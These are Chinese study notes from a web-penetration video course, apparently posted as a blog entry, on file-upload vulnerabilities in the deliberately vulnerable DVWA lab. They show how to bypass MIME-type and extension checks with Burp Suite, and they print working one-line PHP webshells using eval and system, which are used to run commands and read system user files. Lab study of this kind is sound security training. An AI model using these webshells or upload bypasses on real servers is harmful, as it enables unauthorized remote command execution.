《Web安全渗透全套教程(40集)》学习笔记 | 文件上传漏洞原理及实验
学习视频来源:B站《Web安全渗透全套教程(40集)》个人在学习的同时,也验证了视频中的实验部分,现将授课笔记和实验笔记整理下来。实验环境目标靶机:OWASP_Broken_Web_Apps_VM_1.2,用户名/密码:root/owaspwba测试渗透机:Kali-Linux-2018.2-vm-amd64,用户名/密码:root/toor(2个虚拟机可通过baidu搜索下载,有需要的小伙伴可私
学习视频来源:B站《Web安全渗透全套教程(40集)》
个人在学习的同时,也验证了视频中的实验部分,现将授课笔记和实验笔记整理下来。
实验环境
目标靶机:OWASP_Broken_Web_Apps_VM_1.2,用户名/密码:root/owaspwba
测试渗透机:Kali-Linux-2018.2-vm-amd64,用户名/密码:root/toor
(2个虚拟机可通过baidu搜索下载,有需要的小伙伴可私信我)
渗透机开启ssh服务(默认无法通过SecureCRT登录)
service ssh
systemctl enable ssh
systemctl status ssh
验证服务正常启动
实验原理
实验过程
实验一:低安全模式下,上传任意类型的文件,文件大小限制
(1):通过浏览器访问172.16.190.198(小伙伴们的虚机通过NAT获取的IP地址应该是其他地址)
(2):点击登录Damn Vulnerable Web Application时用户名/密码:admin/admin
(3):此处查看到当前安全级别为Low
(4):选择任意类型文件上传(非图像文件)
(5):上传成功
(6):查看Low级别下php源码
实验二:中安全模式下,绕过类型上传文件【文件mime类型】
(1):调整安全级别为medium
(2):查看Medium级别下php源码,其对mime类型进行了校验
(3):无法上传非图像文件
(4):下载并使用该软件
(5):BurpSuite代理工作原理
(6):Kali虚拟机设置代理服务器
(7):点击Kali虚机中的BurpSuite,创建空项目
(8):使用默认参数,点击Start Burp
(9):默认代理功能开启
(10):如果希望外部主机的浏览器也需使用代理,则需要开启所有接口的监听
(11):浏览器上传文件时,并不会直接成功,点击Forward才会成功
(12):上传php文件,但修改Content-type为image/jpeg
(13):修改完毕后再点击Forward即可上传
(14):绕过medium中级安全防护,上传成功
实验三:高安全模式 - 上传一句话图片木马【文件后缀限制】
(1):修改级别为High
(2):查看源码为限制了文件的后缀名
(3):上传php文件无法上传
(4):可用代理拦截,修改文件后缀名,点击Forward
(5):文件就可以成功上传
Webshell
小马:一句话木马也称为小马,即整个shell代码量只有一行,一般是系统执行函数
大马:代码量和功能比小马多,一般会进行二次编码加密,防止被安全防火墙/入侵系统检测到
(1):编写shell2.php,并成功上传,其中内容为<?php eval($_REQUEST['guol']);?>
(2):在浏览器输入文件路径及参数,可以查看php信息
(3):编写shell3.php,并成功上传,其中内容为<?php system($_REQUEST['guol']);?>
(4):在浏览器输入文件路径及参数,可以查看linux系统用户名和密码
更多推荐
所有评论(0)